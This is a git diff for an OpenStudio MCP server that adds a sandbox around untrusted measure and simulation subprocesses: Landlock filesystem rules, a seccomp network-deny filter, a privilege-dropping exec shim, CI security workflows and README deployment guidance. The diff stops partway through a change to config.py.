diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 6ffc936..fe15393 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -92,14 +92,15 @@ jobs:
           retention-days: 1
 
   arm64-test:
-    # Start of arm64 test matrix: shard 1 only (real EnergyPlus sim via SEB4 OSW,
-    # asserts EUI ≈ 1.875 ± 2%). Expand to [1..5] once arm64 sim parity is proven.
+    # arm64 test matrix: shard 1 = real EnergyPlus sim via SEB4 OSW (asserts EUI
+    # ≈ 1.875 ± 2%) + weather/loops; shard 2 = the arch-sensitive set (SWIG/stdout
+    # deb-vs-wheel, measure exec/bundler, an HVAC sim). Both run confined (auto).
     needs: arm64-build
     runs-on: ubuntu-24.04-arm
     strategy:
       fail-fast: false
       matrix:
-        shard: [1]
+        shard: [1, 2]
     steps:
       - uses: actions/checkout@v4
 
@@ -115,6 +116,9 @@ jobs:
         env:
           RUN_OPENSTUDIO_INTEGRATION: "1"
           MCP_SERVER_CMD: "openstudio-mcp"
+          # Run the integration suite confined (explicit, not via the code default).
+          # Measures/sims drop to the unprivileged sandbox uid + Landlock + seccomp.
+          OSMCP_SANDBOX: "auto"
         run: |
           mkdir -p runs
           case ${{ matrix.shard }} in
@@ -123,10 +127,19 @@ jobs:
               FILES="tests/test_example_workflows.py tests/test_component_properties.py tests/test_comstock.py tests/test_weather.py tests/test_weather_files.py tests/test_mcp_seb4.py tests/test_create_constructions.py tests/test_loop_operations.py tests/test_plant_loop_demand.py tests/test_sizing_properties.py tests/test_skill_retrofit.py tests/test_integration.py"
               EXTRA_ENV="-e MCP_OSW_PATH=tests/assets/SEB_model/SEB4_baseboard/workflow.osw -e EXPECTED_EUI=1.8750760248144998 -e EXPECTED_EUI_RTOL=0.02 -e EXPECTED_EUI_ATOL=0.0"
               ;;
+            2)
+              # arm64 arch-sensitive coverage (the deb-vs-wheel / native-ISA risks):
+              #  - SWIG memleak + stdout suppression (wheel-vs-deb behaviour)
+              #  - measure apply + authoring (Ruby/Python exec + bundler on arm64)
+              #  - an HVAC EnergyPlus sim (arm64 E+ build correctness)
+              # (The sandbox/security PoC runs on arm64 via the security workflow.)
+              FILES="tests/test_swig_memleak_cleanup.py tests/test_stdout_logger_silence.py tests/test_measures.py tests/test_measure_authoring.py tests/test_hvac_supply_sim.py"
+              EXTRA_ENV=""
+              ;;
           esac
           docker run --rm \
             -v "$PWD:/repo" -v "$PWD/runs:/runs" \
-            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD \
+            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD -e OSMCP_SANDBOX \
             $EXTRA_ENV \
             openstudio-mcp:arm64 bash -lc "cd /repo && pytest -vv -s $FILES"
 
@@ -182,6 +195,9 @@ jobs:
         env:
           RUN_OPENSTUDIO_INTEGRATION: "1"
           MCP_SERVER_CMD: "openstudio-mcp"
+          # Run the integration suite confined (explicit, not via the code default).
+          # Measures/sims drop to the unprivileged sandbox uid + Landlock + seccomp.
+          OSMCP_SANDBOX: "auto"
         run: |
           mkdir -p runs
           case ${{ matrix.shard }} in
@@ -215,6 +231,6 @@ jobs:
           esac
           docker run --rm \
             -v "$PWD:/repo" -v "$PWD/runs:/runs" \
-            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD \
+            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD -e OSMCP_SANDBOX \
             $EXTRA_ENV \
             openstudio-mcp:dev bash -lc "cd /repo && pytest -vv -s $FILES"
diff --git a/.github/workflows/security.yml b/.github/workflows/security.yml
new file mode 100644
index 0000000..ecb595c
--- /dev/null
+++ b/.github/workflows/security.yml
@@ -0,0 +1,51 @@
+name: security
+
+# Dedicated workflow for the security / sandbox-confinement suite
+# (tests/test_sandbox.py), kept separate from the main `ci` shards so the
+# security tests run and report on their own. Runs the full sandbox tier
+# (OSMCP_SANDBOX=auto) on BOTH amd64 and arm64 — the seccomp BPF and Landlock
+# use arch-specific syscall numbers, so arm64 must be exercised explicitly.
+# Individual tests still pin their own mode per fixture (off/posix/auto).
+
+on:
+  push:
+    branches: [feat/measure-exec-sandbox]
+  pull_request:
+  workflow_dispatch:
+
+jobs:
+  security-tests:
+    name: security-tests (${{ matrix.arch }})
+    runs-on: ${{ matrix.runner }}
+    strategy:
+      fail-fast: false
+      matrix:
+        include:
+          - arch: amd64
+            runner: ubuntu-latest
+            dockerfile: docker/Dockerfile
+          - arch: arm64
+            runner: ubuntu-24.04-arm
+            dockerfile: docker/Dockerfile.arm64
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Build image (${{ matrix.arch }})
+        run: docker build -f ${{ matrix.dockerfile }} -t openstudio-mcp:dev .
+
+      - name: Run security suite (${{ matrix.arch }})
+        env:
+          RUN_OPENSTUDIO_INTEGRATION: "1"
+          MCP_SERVER_CMD: "openstudio-mcp"
+          OSMCP_SANDBOX: "auto"
+        run: |
+          mkdir -p runs
+          FILES=$(ls tests/test_sandbox.py tests/test_security_*.py 2>/dev/null || true)
+          if [ -z "$FILES" ]; then
+            echo "No security tests present in this checkout — nothing to run."
+            exit 0
+          fi
+          echo "[${{ matrix.arch }}] security tests under OSMCP_SANDBOX=$OSMCP_SANDBOX: $FILES"
+          docker run --rm -v "$PWD:/repo" -v "$PWD/runs:/runs" \
+            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD -e OSMCP_SANDBOX \
+            openstudio-mcp:dev bash -lc "cd /repo && pytest -vv $FILES"
diff --git a/README.md b/README.md
index 178b727..9ed965b 100644
--- a/README.md
+++ b/README.md
@@ -52,7 +52,7 @@ Add to your Claude Desktop config (`~/Library/Application Support/Claude/claude_
       "command": "docker",
       "args": [
         "run", "--rm", "-i",
-        "-v", "./tests/assets:/inputs",
+        "-v", "./tests/assets:/inputs:ro",
         "-v", "./runs:/runs",
         "-v", "./.claude/skills:/skills:ro",
         "-e", "OPENSTUDIO_MCP_MODE=prod",
@@ -95,6 +95,76 @@ See **[docs/remote-multi-user.md](docs/remote-multi-user.md)** for setup, auth,
 
 ---
 
+## Security and simulation sandbox
+
+OpenStudio measures are Ruby or Python programs and must be treated as untrusted
+code. EnergyPlus workflows can also invoke measure code. Docker isolates the
+container from the host, while openstudio-mcp adds a second sandbox around the
+child processes used by `apply_measure`, `test_measure`, measure metadata
+refresh, and simulations.
+
+The default `OSMCP_SANDBOX=auto` mode provides the following controls on Linux,
+including Docker Desktop's Linux VM:
+
+- **Privilege drop:** child processes run as the image's unprivileged
+  `sandbox` user (UID/GID 1001), while the MCP server retains only the
+  privileges needed to prepare run directories.
+- **Filesystem policy:** Landlock denies filesystem access by default. The
+  current run or staged measure directory is writable; required system and
+  OpenStudio directories are read-only. `/repo`, `/inputs`, and other users'
+  run directories are not exposed to measure code.
+- **Network policy:** seccomp denies outbound IP networking by default.
+- **Secret isolation:** child processes receive an allowlisted environment
+  instead of inheriting API keys, tokens, and other server environment
+  variables.
+- **Process hardening:** `no_new_privs` prevents privilege recovery through
+  setuid executables. Resource limits constrain generated file size and process
+  count, and simulations have a wall-clock timeout.
+- **Staging:** input models, weather files, measures, and OSWs are copied into a
+  private run directory before execution. Escaping symlinks are rejected.
+
+On Linux, `auto` fails closed if Landlock or the seccomp network filter cannot
+be installed: the untrusted child process does not run. On native macOS or
+Windows without Docker, kernel confinement is unavailable and the server warns
+that only environment filtering is active. Use the Docker image when running
+untrusted measures.
+
+### Sandbox options
+
+| Variable | Default | Behavior |
+|----------|---------|----------|
+| `OSMCP_SANDBOX` | `auto` | `auto`, `full`, and `landlock` request environment filtering, UID/GID drop, resource limits, Landlock filesystem confinement, and seccomp network denial. `posix` omits Landlock and seccomp. `off` disables child-process confinement and is only appropriate for trusted local code. Unknown values fall back to `auto`. |
+| `OSMCP_SANDBOX_NET` | `deny` | `deny` blocks outbound IP networking. `allow` permits it for trusted measures that must fetch external resources. |
+| `OSMCP_SANDBOX_UID` / `OSMCP_SANDBOX_GID` | `1001` | Account used for confined child processes. Values less than 1 are rejected. The default matches the `sandbox` user built into the image. |
+| `OSMCP_SANDBOX_RLIMIT_FSIZE` | `10737418240` | Maximum size in bytes of one file created by a child process. `0` disables this limit. |
+| `OSMCP_SANDBOX_RLIMIT_NPROC` | `1024` | Maximum processes/threads for the sandbox UID. `0` disables this limit. |
+| `OSMCP_SANDBOX_RLIMIT_NOFILE` | `0` | Optional open-file descriptor limit. |
+| `OSMCP_SANDBOX_RLIMIT_CPU` | `0` | Optional CPU-seconds limit. Disabled by default because annual simulations can be long-running. |
+| `OSMCP_SANDBOX_RLIMIT_AS` | `0` | Optional virtual-memory limit. Prefer Docker memory limits because restrictive address-space limits can break EnergyPlus. |
+| `OSMCP_SIM_TIMEOUT_SECONDS` | `7200` | Wall-clock timeout for a simulation. `0` disables the timeout. |
+
+### Secure deployment guidance
+
+- Mount `/inputs` read-only: `-v /host/inputs:/inputs:ro`.
+- Mount only the output directory at `/runs`; any process allowed to write
+  `/runs` can modify that host directory by design.
+- Mount workflow guides read-only at `/skills`, or use the copy already baked
+  into the image: `-v /host/.claude/skills:/skills:ro`.
+- Do not mount the repository, home directory, Docker socket, credentials, or
+  broad host paths into production containers. The `/repo` source mount in the
+  testing commands is for development only.
+- Keep `OSMCP_SANDBOX=auto` and `OSMCP_SANDBOX_NET=deny` for untrusted measure
+  authoring. Docker's `--network none` can provide an additional
+  container-wide network boundary when remote access is not required.
+- Use Docker CPU, memory, PID, and disk quotas as outer limits. The in-process
+  resource limits are defense in depth, not replacements for container limits.
+
+The sandbox protects the host and other run directories, but it intentionally
+allows measure code to modify its own staged run directory. Treat resulting
+OSM, SQL, report, and log files as untrusted outputs.
+
+---
+
 ## Workflow skills
 
 In Claude Code, 12 bundled skills add workflow automation and domain knowledge:
diff --git a/docker/Dockerfile b/docker/Dockerfile
index 588ec84..528fae0 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -7,6 +7,11 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
     ca-certificates curl \
     && rm -rf /var/lib/apt/lists/*
 
+# Unprivileged account that confined measure/simulation subprocesses drop to
+# (see mcp_server/_sandbox_exec.py). The server stays root; only the exec'd
+# measure/EnergyPlus child runs as this uid when OSMCP_SANDBOX is enabled.
+RUN useradd -r -u 1001 -s /usr/sbin/nologin sandbox
+
 # ComStock measures (openstudio-standards-based templates for space types,
 # constructions, HVAC, schedules). Only the measures/ directory is kept (~50 MB).
 ARG COMSTOCK_TAG=2025-3
diff --git a/docker/Dockerfile.arm64 b/docker/Dockerfile.arm64
index 86808b8..929eca9 100644
--- a/docker/Dockerfile.arm64
+++ b/docker/Dockerfile.arm64
@@ -26,6 +26,10 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
     ruby-full \
     && rm -rf /var/lib/apt/lists/*
 
+# Unprivileged account that confined measure/simulation subprocesses drop to
+# (parity with docker/Dockerfile; see mcp_server/_sandbox_exec.py).
+RUN useradd -r -u 1001 -s /usr/sbin/nologin sandbox
+
 # OpenStudio arm64 — official NREL .deb. Pulls in libstdc++ etc. as deps.
 RUN curl -fSL \
       "https://github.com/NREL/OpenStudio/releases/download/v${OPENSTUDIO_VERSION}/OpenStudio-${OPENSTUDIO_VERSION}+${OPENSTUDIO_SHA}-Ubuntu-24.04-arm64.deb" \
@@ -40,9 +44,14 @@ RUN curl -fSL \
 # The nrel/openstudio base image does this; the .deb does not. Without it,
 # every measure-based MCP tool fails at runtime (ComStock, common-measures,
 # apply_measure). Mirrors NREL/docker-openstudio's /var/oscli setup.
+# A stable symlink (/usr/local/openstudio-Ruby) is created in the RUN below so
+# RUBYLIB can be a fixed ENV — the install dir name carries a build-SHA suffix.
+# Both link and target live under /usr/local, which the sandbox Landlock policy
+# grants read+exec.
 RUN OPENSTUDIO_FOLDER=$(find /usr -maxdepth 2 -name "openstudio-${OPENSTUDIO_VERSION}*" -type d | head -n1) \
     && test -n "$OPENSTUDIO_FOLDER" || { echo "openstudio install dir not found"; exit 1; } \
     && echo "OPENSTUDIO_FOLDER=$OPENSTUDIO_FOLDER" \
+    && ln -sfn "$OPENSTUDIO_FOLDER/Ruby" /usr/local/openstudio-Ruby \
     && gem install bundler -v ${OS_BUNDLER_VERSION} --no-document \
     && gem install zip --no-document \
     && mkdir -p /var/oscli \
@@ -53,6 +62,12 @@ RUN OPENSTUDIO_FOLDER=$(find /usr -maxdepth 2 -name "openstudio-${OPENSTUDIO_VER
     && bundle _${OS_BUNDLER_VERSION}_ install --path=gems --without=native_ext --jobs=4 --retry=3 \
     && test -d /var/oscli/gems || { echo "/var/oscli/gems missing after bundle install"; exit 1; }
 
+# Let the system `ruby` resolve `require 'openstudio'` (parity with the amd64
+# nrel/openstudio base, which sets RUBYLIB to the install's Ruby dir). test_measure
+# runs Ruby unit tests via `ruby -I .` directly — `openstudio measure -r` does not
+# run minitest — so without this the measure tests fail with a LoadError.
+ENV RUBYLIB=/usr/local/openstudio-Ruby
+
 # ComStock measures (openstudio-standards-based templates for space types,
 # constructions, HVAC, schedules). Only the measures/ directory is kept (~50 MB).
 ARG COMSTOCK_TAG=2025-3
diff --git a/mcp_server/_landlock.py b/mcp_server/_landlock.py
new file mode 100644
index 0000000..ae1fcfd
--- /dev/null
+++ b/mcp_server/_landlock.py
@@ -0,0 +1,130 @@
+"""Minimal Landlock (LSM) filesystem confinement via raw syscalls (ctypes).
+
+Three syscalls, no external dependency (house style: grepable, owned). Applies a
+read-deny-by-default policy to the current process and all its children: only the
+enumerated read-only paths are readable/executable, and only the run dir is
+writable. Requires no_new_privs (set by the caller) for unprivileged use; works
+inside default-seccomp Docker >= 23.0 (the landlock_* syscalls are allowlisted
+there). Returns the applied ABI, or 0 when Landlock is unavailable — the caller
+degrades loudly rather than failing the run.
+"""
+from __future__ import annotations
+
+import ctypes
+import os
+import stat
+
+# Generic syscall table numbers (identical on x86_64 and aarch64).
+_NR_CREATE_RULESET = 444
+_NR_ADD_RULE = 445
+_NR_RESTRICT_SELF = 446
+
+_CREATE_RULESET_VERSION = 1  # query the ABI instead of creating a ruleset
+_RULE_PATH_BENEATH = 1
+
+# access_fs rights (bit positions). 0..12 = ABI 1, REFER = ABI 2, TRUNCATE = ABI 3.
+_A_EXECUTE = 1 << 0
+_A_WRITE_FILE = 1 << 1
+_A_READ_FILE = 1 << 2
+_A_READ_DIR = 1 << 3
+_A_REMOVE_DIR = 1 << 4
+_A_REMOVE_FILE = 1 << 5
+_A_MAKE_CHAR = 1 << 6
+_A_MAKE_DIR = 1 << 7
+_A_MAKE_REG = 1 << 8
+_A_MAKE_SOCK = 1 << 9
+_A_MAKE_FIFO = 1 << 10
+_A_MAKE_BLOCK = 1 << 11
+_A_MAKE_SYM = 1 << 12
+_A_REFER = 1 << 13      # ABI >= 2
+_A_TRUNCATE = 1 << 14   # ABI >= 3
+_A_IOCTL_DEV = 1 << 15  # ABI >= 5 — governs ioctl() on device files
+
+_RO = _A_EXECUTE | _A_READ_FILE | _A_READ_DIR
+_RW_BASE = (
+    _A_EXECUTE | _A_WRITE_FILE | _A_READ_FILE | _A_READ_DIR
+    | _A_REMOVE_DIR | _A_REMOVE_FILE | _A_MAKE_CHAR | _A_MAKE_DIR | _A_MAKE_REG
+    | _A_MAKE_SOCK | _A_MAKE_FIFO | _A_MAKE_BLOCK | _A_MAKE_SYM
+)
+# Rights that are meaningful on a non-directory. Landlock's add_rule returns
+# EINVAL if a rule on a FILE carries directory-only rights (READ_DIR, MAKE_*,
+# REMOVE_*), so a per-file rule (e.g. /dev/null) MUST be masked to these.
+_FILE_ONLY = _A_EXECUTE | _A_WRITE_FILE | _A_READ_FILE | _A_TRUNCATE | _A_IOCTL_DEV
+
+
+class _RulesetAttr(ctypes.Structure):
+    # Only handled_access_fs — 8 bytes, valid on every ABID (kernel reads the
+    # field set implied by `size`); avoids the ABI>=4 net field tripping abi3.
+    _fields_ = [("handled_access_fs", ctypes.c_uint64)]
+
+
+class _PathBeneathAttr(ctypes.Structure):
+    # MUST be packed (12 bytes). The kernel UAPI declares
+    #   struct landlock_path_beneath_attr { __u64 allowed_access; __s32 parent_fd; }
+    #   __attribute__((packed));
+    # so _pack_=1 matches the kernel exactly. Do NOT "fix" this to natural
+    # alignment (16 bytes) — that would mismatch the kernel struct. Verified by
+    # the integration tests, which only pass if add_rule parsed this correctly.
+    _pack_ = 1
+    _fields_ = [("allowed_access", ctypes.c_uint64), ("parent_fd", ctypes.c_int32)]
+
+
+def restrict(ro_paths: list[str], rw_paths: list[str]) -> int:
+    """Confine the filesystem to ro_paths (read+exec) and rw_paths (read+write).
+
+    Returns the applied Landlock ABI (>=1), or 0 if Landlock is unavailable or
+    the ruleset could not be enforced. Missing paths are skipped silently.
+    """
+    libc = ctypes.CDLL("libc.so.6", use_errno=True)
+
+    abi = libc.syscall(_NR_CREATE_RULESET, None, 0, _CREATE_RULESET_VERSION)
+    if abi <= 0:
+        return 0
+
+    handled = _RW_BASE
+    if abi >= 2:
+        handled |= _A_REFER
+    if abi >= 3:
+        handled |= _A_TRUNCATE
+    if abi >= 5:
+        handled |= _A_IOCTL_DEV  # govern device ioctls (esp. with /dev writable)
+
+    attr = _RulesetAttr(handled_access_fs=handled)
+    rs_fd = libc.syscall(_NR_CREATE_RULESET, ctypes.byref(attr), ctypes.sizeof(attr), 0)
+    if rs_fd < 0:
+        return 0
+
+    def _add(path: str, access: int) -> bool:
+        """True if the path is absent (optional, skip) or its rule was added;
+        False only if a PRESENT path's rule failed (a broken ruleset)."""
+        try:
+            fd = os.open(path, os.O_PATH | os.O_CLOEXEC)
+        except OSError:
+            return True  # absent path — optional, not a failure
+        try:
+            acc = access & handled
+            # A rule on a non-directory (e.g. /dev/null) must carry only file
+            # rights — dir-only bits make add_rule fail with EINVAL.
+            if not stat.S_ISDIR(os.fstat(fd).st_mode):
+                acc &= _FILE_ONLY
+            pba = _PathBeneathAttr(allowed_access=acc, parent_fd=fd)
+            return libc.syscall(_NR_ADD_RULE, rs_fd, _RULE_PATH_BENEATH, ctypes.byref(pba), 0) == 0
+        finally:
+            os.close(fd)
+
+    ok = True
+    for p in ro_paths:
+        ok = _add(p, _RO) and ok
+    for p in rw_paths:
+        ok = _add(p, handled) and ok  # full set for the writable run dir
+    if not ok:
+        # A present path's rule was rejected → enforce nothing rather than a
+        # half-applied policy; the caller (auto tier) fails closed on a 0 return.
+        os.close(rs_fd)
+        return 0
+
+    # no_new_privs is set by the caller; restrict_self enforces the ruleset on
+    # this process and everything it execs/forks.
+    rc = libc.syscall(_NR_RESTRICT_SELF, rs_fd, 0)
+    os.close(rs_fd)
+    return abi if rc == 0 else 0
diff --git a/mcp_server/_sandbox_exec.py b/mcp_server/_sandbox_exec.py
new file mode 100644
index 0000000..36eb1e3
--- /dev/null
+++ b/mcp_server/_sandbox_exec.py
@@ -0,0 +1,126 @@
+"""Privilege-dropping exec shim for confined measure / simulation subprocesses.
+
+Invoked by mcp_server.sandbox.wrap_cmd as::
+
+    python3 -m mcp_server._sandbox_exec --uid N --gid N \
+        [--rlimit-fsize BYTES] [--rlimit-nproc N] [--rlimit-nofile N] \
+        [--rlimit-cpu SECONDS] [--rlimit-as BYTES] \
+        [--landlock-ro PATH ...] [--landlock-rw PATH ...] [--seccomp-net] \
+        -- CMD [ARG...]
+
+Applies, in order: rlimits, ``prctl(no_new_privs)``, Landlock FS policy and a
+seccomp network-deny filter (when their flags are given), then drops to the
+unprivileged uid/gid **only when running as root** (a non-root local server keeps
+its uid — the FS/network confinement is unprivileged and still applies), and
+finally ``execvp``s CMD. A standalone exec — NOT a Popen ``preexec_fn`` — so
+there is no fork-safety hazard in the threaded server, and the exec'd image keeps
+the same pid (so the dispatcher's terminate/kill-by-pid path still works).
+"""
+from __future__ import annotations
+
+import argparse
+import ctypes
+import os
+import resource
+import sys
+
+# Imported up-front (before any Landlock restriction is applied below) so the
+# module files are read while the filesystem is still unconfined.
+from mcp_server import _landlock, _seccomp
+
+_RLIMITS = {
+    "cpu": resource.RLIMIT_CPU,        # CPU-seconds
+    "fsize": resource.RLIMIT_FSIZE,    # max single-file bytes
+    "nproc": resource.RLIMIT_NPROC,    # processes/threads for the uid
+    "nofile": resource.RLIMIT_NOFILE,  # open file descriptors
+    "as": resource.RLIMIT_AS,          # virtual address space bytes
+}
+
+_PR_SET_NO_NEW_PRIVS = 38
+
+
+def _set_no_new_privs() -> None:
+    """Promise the kernel we will never gain privileges via setuid binaries.
+
+    Prerequisite for the unprivileged Landlock/seccomp backends landing next; set
+    here so the contract holds from the POSIX tier onward.
+    """
+    libc = ctypes.CDLL("libc.so.6", use_errno=True)
+    if libc.prctl(_PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0:
+        raise OSError(ctypes.get_errno(), "prctl(PR_SET_NO_NEW_PRIVS) failed")
+
+
+def main(argv: list[str]) -> int:
+    if "--" not in argv:
+        print("sandbox-exec: missing '-- CMD'", file=sys.stderr)
+        return 2
+    sep = argv.index("--")
+    cmd = argv[sep + 1:]
+    if not cmd:
+        print("sandbox-exec: empty command", file=sys.stderr)
+        return 2
+
+    ap = argparse.ArgumentParser(add_help=False)
+    ap.add_argument("--uid", type=int, required=True)
+    ap.add_argument("--gid", type=int, required=True)
+    for name in _RLIMITS:
+        ap.add_argument(f"--rlimit-{name}", type=int, default=0)
+    ap.add_argument("--landlock-ro", action="append", default=[])
+    ap.add_argument("--landlock-rw", action="append", default=[])
+    ap.add_argument("--seccomp-net", action="store_true")
+    ns = ap.parse_args(argv[:sep])
+
+    # rlimits first, while still privileged (lowering hard limits is always ok).
+    for name, res_id in _RLIMITS.items():
+        val = getattr(ns, f"rlimit_{name}")
+        if val and val > 0:
+            try:
+                resource.setrlimit(res_id, (val, val))
+            except (ValueError, OSError) as e:
+                print(f"sandbox-exec: rlimit {name}={val} failed: {e}", file=sys.stderr)
+
+    _set_no_new_privs()
+
+    # Filesystem + network confinement (after no_new_privs, before the uid drop;
+    # both persist across setuid + exec and are inherited by children). Degrade
+    # loudly — a backend that cannot engage prints a notice and the run proceeds
+    # with whatever confinement did apply (the POSIX floor always holds).
+    # Fail CLOSED: if a kernel backend was requested (auto/full tier) but cannot
+    # engage, refuse to run rather than execute untrusted code unconfined. An
+    # operator who knowingly wants weaker confinement selects OSMCP_SANDBOX=posix
+    # (UID drop + rlimits, no kernel FS/net) or off — neither requests these flags.
+    if (ns.landlock_ro or ns.landlock_rw) and not _landlock.restrict(ns.landlock_ro, ns.landlock_rw):
+        print("sandbox-exec: FATAL Landlock requested but unavailable — refusing to run "
+              "unconfined (use OSMCP_SANDBOX=posix or off to accept weaker confinement)",
+              file=sys.stderr)
+        return 3
+    if ns.seccomp_net and not _seccomp.install_net_deny():
+        print("sandbox-exec: FATAL seccomp net-deny requested but unavailable — refusing to "
+              "run unconfined (use OSMCP_SANDBOX=posix or off)", file=sys.stderr)
+        return 3
+
+    # Drop privileges only when we have them (root). The FS/network confinement
+    # above is unprivileged and already applied — so a non-root local server still
+    # gets Landlock + seccomp + rlimits; only the uid-drop (a defence-in-depth /
+    # multi-tenant layer) is skipped. Order matters: groups, gid, then uid.
+    if os.geteuid() == 0:
+        os.setgroups([ns.gid])
+        os.setgid(ns.gid)
+        os.setuid(ns.uid)
+        if os.getuid() != ns.uid or os.geteuid() != ns.uid:
+            print("sandbox-exec: uid drop did not stick", file=sys.stderr)
+            return 2
+    elif os.getuid() != ns.uid:
+        print(f"sandbox-exec: not root (uid {os.getuid()}) — keeping uid; "
+              "FS/network confinement still applied", file=sys.stderr)
+
+    try:
+        os.execvp(cmd[0], cmd)  # noqa: S606 - intentional shell-less exec of the confined command
+    except OSError as e:
+        print(f"sandbox-exec: exec {cmd[0]} failed: {e}", file=sys.stderr)
+        return 127
+    return 0  # unreachable
+
+
+if __name__ == "__main__":
+    sys.exit(main(sys.argv[1:]))
diff --git a/mcp_server/_seccomp.py b/mcp_server/_seccomp.py
new file mode 100644
index 0000000..f80342c
--- /dev/null
+++ b/mcp_server/_seccomp.py
@@ -0,0 +1,111 @@
+"""Minimal seccomp-BPF network deny via raw syscalls (ctypes), no dependency.
+
+Installs a classic-BPF seccomp filter that fails ``socket(AF_INET|AF_INET6, ...)``
+with EAFNOSUPPORT and leaves AF_UNIX (and every other syscall) untouched —
+blocking outbound IP networking from measure code while local IPC / the bundler
+still work. The program is built for the running arch (the shim executes on the
+workload's arch), so there is no cross-arch branching to get wrong; an unexpected
+arch makes install a no-op. Requires no_new_privs (set by the caller).
+
+Returns True if the filter was installed, False if unavailable — the caller
+degrades loudly rather than failing the run.
+"""
+from __future__ import annotations
+
+import ctypes
+import errno
+import platform
+import struct
+
+# BPF opcodes
+_BPF_LD_W_ABS = 0x00 | 0x00 | 0x20   # BPF_LD | BPF_W | BPF_ABS
+_BPF_JEQ_K = 0x05 | 0x10 | 0x00      # BPF_JMP | BPF_JEQ | BPF_K
+_BPF_JSET_K = 0x05 | 0x40 | 0x00     # BPF_JMP | BPF_JSET | BPF_K (bit test)
+_BPF_RET_K = 0x06 | 0x00             # BPF_RET | BPF_K
+
+# seccomp return actions
+_SECCOMP_RET_ALLOW = 0x7FFF0000
+_SECCOMP_RET_ERRNO = 0x00050000
+_SECCOMP_RET_KILL_PROCESS = 0x80000000
+_X32_SYSCALL_BIT = 0x40000000  # x86_64 x32 ABI marks syscall nrs with this bit
+
+# seccomp_data field offsets (nr@0, arch@4, ip@8, args[0]@16 ...; little-endian)
+_OFF_NR = 0
+_OFF_ARCH = 4
+_OFF_ARG0 = 16
+
+# AUDIT_ARCH + syscall numbers per arch. io_uring_setup is blocked too: io_uring
+# can create/connect sockets via submission-queue ops, bypassing a socket()-only
+# filter — denying its setup closes that hole (no measure legitimately uses it).
+_AUDIT_ARCH = {"x86_64": 0xC000003E, "aarch64": 0xC00000B7}
+_NR_SOCKET = {"x86_64": 41, "aarch64": 198}
+_NR_IO_URING_SETUP = {"x86_64": 425, "aarch64": 425}  # generic syscall number
+
+_AF_INET = 2
+_AF_INET6 = 10
+
+_PR_SET_SECCOMP = 22
+_SECCOMP_MODE_FILTER = 2
+
+
+def _stmt(code: int, k: int) -> bytes:
+    return struct.pack("=HBBI", code, 0, 0, k)
+
+
+def _jump(code: int, k: int, jt: int, jf: int) -> bytes:
+    return struct.pack("=HBBI", code, jt, jf, k)
+
+
+class _SockFprog(ctypes.Structure):
+    _fields_ = [("len", ctypes.c_ushort), ("filter", ctypes.c_void_p)]
+
+
+def install_net_deny() -> bool:
+    mach = platform.machine()
+    if mach not in _AUDIT_ARCH:
+        return False
+    audit_arch = _AUDIT_ARCH[mach]
+    nr_socket = _NR_SOCKET[mach]
+    nr_io_uring = _NR_IO_URING_SETUP[mach]
+    deny_net = _SECCOMP_RET_ERRNO | (errno.EAFNOSUPPORT & 0xFFFF)
+    deny_enosys = _SECCOMP_RET_ERRNO | (errno.ENOSYS & 0xFFFF)  # io_uring "unavailable"
+
+    # Instruction layout (jt/jf are offsets from the NEXT instruction). Unexpected
+    # architectures (e.g. a 32-bit i386 binary, different AUDIT_ARCH) and x32-ABI
+    # syscalls (x86_64 syscall nr with the 0x40000000 bit) are KILLed rather than
+    # allowed — otherwise they'd issue unfiltered socket() calls (fail-open).
+    #    0  load arch
+    #    1  arch == ours ?            -> 2          : KILL(9)
+    #    2  load nr
+    #    3  nr & x32_bit ?            -> KILL(9)    : 4
+    #    4  nr == io_uring_setup ?    -> ENOSYS(10) : 5
+    #    5  nr == socket ?            -> 6          : ALLOW(12)
+    #    6  load args[0] (domain)
+    #    7  domain == AF_INET  ?      -> DENY_NET(11): 8
+    #    8  domain == AF_INET6 ?      -> DENY_NET(11): ALLOW(12)
+    #    9  RET kill
+    #   10  RET enosys
+    #   11  RET deny_net (EAFNOSUPPORT)
+    #   12  RET allow
+    program = b"".join([
+        _stmt(_BPF_LD_W_ABS, _OFF_ARCH),
+        _jump(_BPF_JEQ_K, audit_arch, 0, 7),
+        _stmt(_BPF_LD_W_ABS, _OFF_NR),
+        _jump(_BPF_JSET_K, _X32_SYSCALL_BIT, 5, 0),
+        _jump(_BPF_JEQ_K, nr_io_uring, 5, 0),
+        _jump(_BPF_JEQ_K, nr_socket, 0, 6),
+        _stmt(_BPF_LD_W_ABS, _OFF_ARG0),
+        _jump(_BPF_JEQ_K, _AF_INET, 3, 0),
+        _jump(_BPF_JEQ_K, _AF_INET6, 2, 3),
+        _stmt(_BPF_RET_K, _SECCOMP_RET_KILL_PROCESS),
+        _stmt(_BPF_RET_K, deny_enosys),
+        _stmt(_BPF_RET_K, deny_net),
+        _stmt(_BPF_RET_K, _SECCOMP_RET_ALLOW),
+    ])
+    n = len(program) // 8
+    buf = ctypes.create_string_buffer(program, len(program))
+    fprog = _SockFprog(len=n, filter=ctypes.cast(buf, ctypes.c_void_p))
+
+    libc = ctypes.CDLL("libc.so.6", use_errno=True)
+    rc = libc.prctl(_PR_SET_SECCOMP, _SECCOMP_MODE_FILTER, ctypes.byref(fprog), 0, 0)
+    return rc == 0
diff --git a/mcp_server/config.py b/mcp_server/config.py
index 4c50bc5..5eff5d4 100644
--- a/mcp_server/config.py
+++ b/mcp_server/config.py
@@ -1,6 +1,8 @@
 from __future__ import annotations
 
+import math
 import os
+import sys
 from pathlib import Path
 
 RUN_ROOT = Path(os.environ.get("OPENSTUDIO_MCP_RUN_ROOT", os.environ.get("OSMCP_RUN_ROOT", "/runs"))).resolve()
@@ -14,9 +16,14 @@ def _safe_int(env_val: str, default: int) -> int:
 
 def _safe_float(env_val: str, default: float) -> float:
     try:
-        return float(env_val)
+        v = float(env_val)
     except (ValueError, TypeError):
         return default
